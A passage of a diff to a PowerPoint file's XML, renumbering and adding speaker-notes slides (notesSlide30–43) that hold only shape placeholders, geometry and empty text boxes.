-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name="Shape 124">
-          <a:extLst>
-            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1B9EFDD-426A-D616-1468-BFDC1B0DE87F}"/>
-            </a:ext>
-          </a:extLst>
-        </p:cNvPr>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="125" name="Google Shape;125;g3575121a9be_0_1:notes">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05AF142E-017B-D673-C759-8412791088BF}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="sldImg" idx="2"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="381000" y="685800"/>
-            <a:ext cx="6096000" cy="3429000"/>
-          </a:xfrm>
-          <a:custGeom>
-            <a:avLst/>
-            <a:gdLst/>
-            <a:ahLst/>
-            <a:cxnLst/>
-            <a:rect l="l" t="t" r="r" b="b"/>
-            <a:pathLst>
-              <a:path w="120000" h="120000" extrusionOk="0">
-                <a:moveTo>
-                  <a:pt x="0" y="0"/>
-                </a:moveTo>
-                <a:lnTo>
-                  <a:pt x="120000" y="0"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="120000" y="120000"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="0" y="120000"/>
-                </a:lnTo>
-                <a:close/>
-              </a:path>
-            </a:pathLst>
-          </a:custGeom>
-        </p:spPr>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="126" name="Google Shape;126;g3575121a9be_0_1:notes">
-            <a:extLst>
-              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
-                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEFDB43B-4DFE-3F8A-75BF-5F8C2EB1E1C1}"/>
-              </a:ext>
-            </a:extLst>
-          </p:cNvPr>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="body" idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="685800" y="4343400"/>
-            <a:ext cx="5486400" cy="4114800"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
-            <a:noAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-    <p:extLst>
-      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
-        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2734908796"/>
       </p:ext>
     </p:extLst>
   </p:cSld>
@@ -3689,6 +3693,133 @@
         <p:cNvPr id="1" name="Shape 124">
           <a:extLst>
             <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1B9EFDD-426A-D616-1468-BFDC1B0DE87F}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="125" name="Google Shape;125;g3575121a9be_0_1:notes">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05AF142E-017B-D673-C759-8412791088BF}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldImg" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="381000" y="685800"/>
+            <a:ext cx="6096000" cy="3429000"/>
+          </a:xfrm>
+          <a:custGeom>
+            <a:avLst/>
+            <a:gdLst/>
+            <a:ahLst/>
+            <a:cxnLst/>
+            <a:rect l="l" t="t" r="r" b="b"/>
+            <a:pathLst>
+              <a:path w="120000" h="120000" extrusionOk="0">
+                <a:moveTo>
+                  <a:pt x="0" y="0"/>
+                </a:moveTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="0"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="120000"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="0" y="120000"/>
+                </a:lnTo>
+                <a:close/>
+              </a:path>
+            </a:pathLst>
+          </a:custGeom>
+        </p:spPr>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="126" name="Google Shape;126;g3575121a9be_0_1:notes">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEFDB43B-4DFE-3F8A-75BF-5F8C2EB1E1C1}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="body" idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="685800" y="4343400"/>
+            <a:ext cx="5486400" cy="4114800"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2734908796"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:notes>
+</file>
+
+<file path=ppt/notesSlides/notesSlide31.xml><?xml version="1.0" encoding="utf-8"?>
+<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 124">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
               <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A01623F2-E7E1-443D-2A29-CBE4F5DA93DE}"/>
             </a:ext>
           </a:extLst>
@@ -3808,7 +3939,7 @@
 </p:notes>
 </file>
 
-<file path=ppt/notesSlides/notesSlide31.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/notesSlides/notesSlide32.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
     <p:spTree>
@@ -3935,7 +4066,7 @@
 </p:notes>
 </file>
 
-<file path=ppt/notesSlides/notesSlide32.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/notesSlides/notesSlide33.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
     <p:spTree>
@@ -4062,7 +4193,7 @@
 </p:notes>
 </file>
 
-<file path=ppt/notesSlides/notesSlide33.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/notesSlides/notesSlide34.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
     <p:spTree>
@@ -4189,7 +4320,134 @@
 </p:notes>
 </file>
 
-<file path=ppt/notesSlides/notesSlide34.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/notesSlides/notesSlide35.xml><?xml version="1.0" encoding="utf-8"?>
+<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 124">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{366DE0C8-C8E7-5F76-CAB4-E3E1043DA36B}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="125" name="Google Shape;125;g3575121a9be_0_1:notes">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F785B3A2-6938-71DA-BCC3-BB82D7FFA27B}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldImg" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="381000" y="685800"/>
+            <a:ext cx="6096000" cy="3429000"/>
+          </a:xfrm>
+          <a:custGeom>
+            <a:avLst/>
+            <a:gdLst/>
+            <a:ahLst/>
+            <a:cxnLst/>
+            <a:rect l="l" t="t" r="r" b="b"/>
+            <a:pathLst>
+              <a:path w="120000" h="120000" extrusionOk="0">
+                <a:moveTo>
+                  <a:pt x="0" y="0"/>
+                </a:moveTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="0"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="120000"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="0" y="120000"/>
+                </a:lnTo>
+                <a:close/>
+              </a:path>
+            </a:pathLst>
+          </a:custGeom>
+        </p:spPr>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="126" name="Google Shape;126;g3575121a9be_0_1:notes">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EB151C7A-E12B-80EA-9D8A-40B3A7B3B58A}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="body" idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="685800" y="4343400"/>
+            <a:ext cx="5486400" cy="4114800"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+    <p:extLst>
+      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
+        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3950318604"/>
+      </p:ext>
+    </p:extLst>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:notes>
+</file>
+
+<file path=ppt/notesSlides/notesSlide36.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
     <p:spTree>
@@ -4316,7 +4574,7 @@
 </p:notes>
 </file>
 
-<file path=ppt/notesSlides/notesSlide35.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/notesSlides/notesSlide37.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
     <p:spTree>
@@ -4443,7 +4701,7 @@
 </p:notes>
 </file>
 
-<file path=ppt/notesSlides/notesSlide36.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/notesSlides/notesSlide38.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
     <p:spTree>
@@ -4570,7 +4828,7 @@
 </p:notes>
 </file>
 
-<file path=ppt/notesSlides/notesSlide37.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/notesSlides/notesSlide39.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
     <p:spTree>
@@ -4697,7 +4955,111 @@
 </p:notes>
 </file>
 
-<file path=ppt/notesSlides/notesSlide38.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/notesSlides/notesSlide4.xml><?xml version="1.0" encoding="utf-8"?>
+<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 115"/>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="116" name="Google Shape;116;g18d9829d3aa_0_49:notes"/>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldImg" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="381000" y="685800"/>
+            <a:ext cx="6096000" cy="3429000"/>
+          </a:xfrm>
+          <a:custGeom>
+            <a:avLst/>
+            <a:gdLst/>
+            <a:ahLst/>
+            <a:cxnLst/>
+            <a:rect l="l" t="t" r="r" b="b"/>
+            <a:pathLst>
+              <a:path w="120000" h="120000" extrusionOk="0">
+                <a:moveTo>
+                  <a:pt x="0" y="0"/>
+                </a:moveTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="0"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="120000"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="0" y="120000"/>
+                </a:lnTo>
+                <a:close/>
+              </a:path>
+            </a:pathLst>
+          </a:custGeom>
+        </p:spPr>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="117" name="Google Shape;117;g18d9829d3aa_0_49:notes"/>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="body" idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="685800" y="4343400"/>
+            <a:ext cx="5486400" cy="4114800"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
+              <a:buNone/>
+            </a:pPr>
+            <a:endParaRPr/>
+          </a:p>
+        </p:txBody>
+      </p:sp>
+    </p:spTree>
+  </p:cSld>
+  <p:clrMapOvr>
+    <a:masterClrMapping/>
+  </p:clrMapOvr>
+</p:notes>
+</file>
+
+<file path=ppt/notesSlides/notesSlide40.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
     <p:spTree>
@@ -4824,7 +5186,7 @@
 </p:notes>
 </file>
 
-<file path=ppt/notesSlides/notesSlide39.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/notesSlides/notesSlide41.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
     <p:spTree>
@@ -4951,111 +5313,7 @@
 </p:notes>
 </file>
 
-<file path=ppt/notesSlides/notesSlide4.xml><?xml version="1.0" encoding="utf-8"?>
-<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
-  <p:cSld>
-    <p:spTree>
-      <p:nvGrpSpPr>
-        <p:cNvPr id="1" name="Shape 115"/>
-        <p:cNvGrpSpPr/>
-        <p:nvPr/>
-      </p:nvGrpSpPr>
-      <p:grpSpPr>
-        <a:xfrm>
-          <a:off x="0" y="0"/>
-          <a:ext cx="0" cy="0"/>
-          <a:chOff x="0" y="0"/>
-          <a:chExt cx="0" cy="0"/>
-        </a:xfrm>
-      </p:grpSpPr>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="116" name="Google Shape;116;g18d9829d3aa_0_49:notes"/>
-          <p:cNvSpPr>
-            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="sldImg" idx="2"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="381000" y="685800"/>
-            <a:ext cx="6096000" cy="3429000"/>
-          </a:xfrm>
-          <a:custGeom>
-            <a:avLst/>
-            <a:gdLst/>
-            <a:ahLst/>
-            <a:cxnLst/>
-            <a:rect l="l" t="t" r="r" b="b"/>
-            <a:pathLst>
-              <a:path w="120000" h="120000" extrusionOk="0">
-                <a:moveTo>
-                  <a:pt x="0" y="0"/>
-                </a:moveTo>
-                <a:lnTo>
-                  <a:pt x="120000" y="0"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="120000" y="120000"/>
-                </a:lnTo>
-                <a:lnTo>
-                  <a:pt x="0" y="120000"/>
-                </a:lnTo>
-                <a:close/>
-              </a:path>
-            </a:pathLst>
-          </a:custGeom>
-        </p:spPr>
-      </p:sp>
-      <p:sp>
-        <p:nvSpPr>
-          <p:cNvPr id="117" name="Google Shape;117;g18d9829d3aa_0_49:notes"/>
-          <p:cNvSpPr txBox="1">
-            <a:spLocks noGrp="1"/>
-          </p:cNvSpPr>
-          <p:nvPr>
-            <p:ph type="body" idx="1"/>
-          </p:nvPr>
-        </p:nvSpPr>
-        <p:spPr>
-          <a:xfrm>
-            <a:off x="685800" y="4343400"/>
-            <a:ext cx="5486400" cy="4114800"/>
-          </a:xfrm>
-          <a:prstGeom prst="rect">
-            <a:avLst/>
-          </a:prstGeom>
-        </p:spPr>
-        <p:txBody>
-          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
-            <a:noAutofit/>
-          </a:bodyPr>
-          <a:lstStyle/>
-          <a:p>
-            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
-              <a:spcBef>
-                <a:spcPts val="0"/>
-              </a:spcBef>
-              <a:spcAft>
-                <a:spcPts val="0"/>
-              </a:spcAft>
-              <a:buNone/>
-            </a:pPr>
-            <a:endParaRPr/>
-          </a:p>
-        </p:txBody>
-      </p:sp>
-    </p:spTree>
-  </p:cSld>
-  <p:clrMapOvr>
-    <a:masterClrMapping/>
-  </p:clrMapOvr>
-</p:notes>
-</file>
-
-<file path=ppt/notesSlides/notesSlide40.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/notesSlides/notesSlide42.xml><?xml version="1.0" encoding="utf-8"?>
 <p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
   <p:cSld>
     <p:spTree>
@@ -5182,7 +5440,365 @@
 </p:notes>
 </file>
 
-<file path=ppt/notesSlides/notesSlide41.xml><?xml version="1.0" encoding="utf-8"?>
+<file path=ppt/notesSlides/notesSlide43.xml><?xml version="1.0" encoding="utf-8"?>
+<p:notes xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" showMasterSp="0" showMasterPhAnim="0">
+  <p:cSld>
+    <p:spTree>
+      <p:nvGrpSpPr>
+        <p:cNvPr id="1" name="Shape 115">
+          <a:extLst>
+            <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+              <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D9FDB905-8F82-4E87-CD82-1B5D5F6ADC74}"/>
+            </a:ext>
+          </a:extLst>
+        </p:cNvPr>
+        <p:cNvGrpSpPr/>
+        <p:nvPr/>
+      </p:nvGrpSpPr>
+      <p:grpSpPr>
+        <a:xfrm>
+          <a:off x="0" y="0"/>
+          <a:ext cx="0" cy="0"/>
+          <a:chOff x="0" y="0"/>
+          <a:chExt cx="0" cy="0"/>
+        </a:xfrm>
+      </p:grpSpPr>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="116" name="Google Shape;116;g18d9829d3aa_0_49:notes">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30877F77-B7DE-DCF4-A73D-523B9E0B85F9}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr>
+            <a:spLocks noGrp="1" noRot="1" noChangeAspect="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="sldImg" idx="2"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="381000" y="685800"/>
+            <a:ext cx="6096000" cy="3429000"/>
+          </a:xfrm>
+          <a:custGeom>
+            <a:avLst/>
+            <a:gdLst/>
+            <a:ahLst/>
+            <a:cxnLst/>
+            <a:rect l="l" t="t" r="r" b="b"/>
+            <a:pathLst>
+              <a:path w="120000" h="120000" extrusionOk="0">
+                <a:moveTo>
+                  <a:pt x="0" y="0"/>
+                </a:moveTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="0"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="120000" y="120000"/>
+                </a:lnTo>
+                <a:lnTo>
+                  <a:pt x="0" y="120000"/>
+                </a:lnTo>
+                <a:close/>
+              </a:path>
+            </a:pathLst>
+          </a:custGeom>
+        </p:spPr>
+      </p:sp>
+      <p:sp>
+        <p:nvSpPr>
+          <p:cNvPr id="117" name="Google Shape;117;g18d9829d3aa_0_49:notes">
+            <a:extLst>
+              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
+                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D374612-BA40-9FB0-D4BD-989FE5EB7628}"/>
+              </a:ext>
+            </a:extLst>
+          </p:cNvPr>
+          <p:cNvSpPr txBox="1">
+            <a:spLocks noGrp="1"/>
+          </p:cNvSpPr>
+          <p:nvPr>
+            <p:ph type="body" idx="1"/>
+          </p:nvPr>
+        </p:nvSpPr>
+        <p:spPr>
+          <a:xfrm>
+            <a:off x="685800" y="4343400"/>
+            <a:ext cx="5486400" cy="4114800"/>
+          </a:xfrm>
+          <a:prstGeom prst="rect">
+            <a:avLst/>
+          </a:prstGeom>
+        </p:spPr>
+        <p:txBody>
+          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
+            <a:noAutofit/>
+          </a:bodyPr>
+          <a:lstStyle/>
+          <a:p>
+            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
+              <a:spcBef>
+                <a:spcPts val="0"/>
+              </a:spcBef>
+              <a:spcAft>
+                <a:spcPts val="0"/>
+              </a:spcAft>
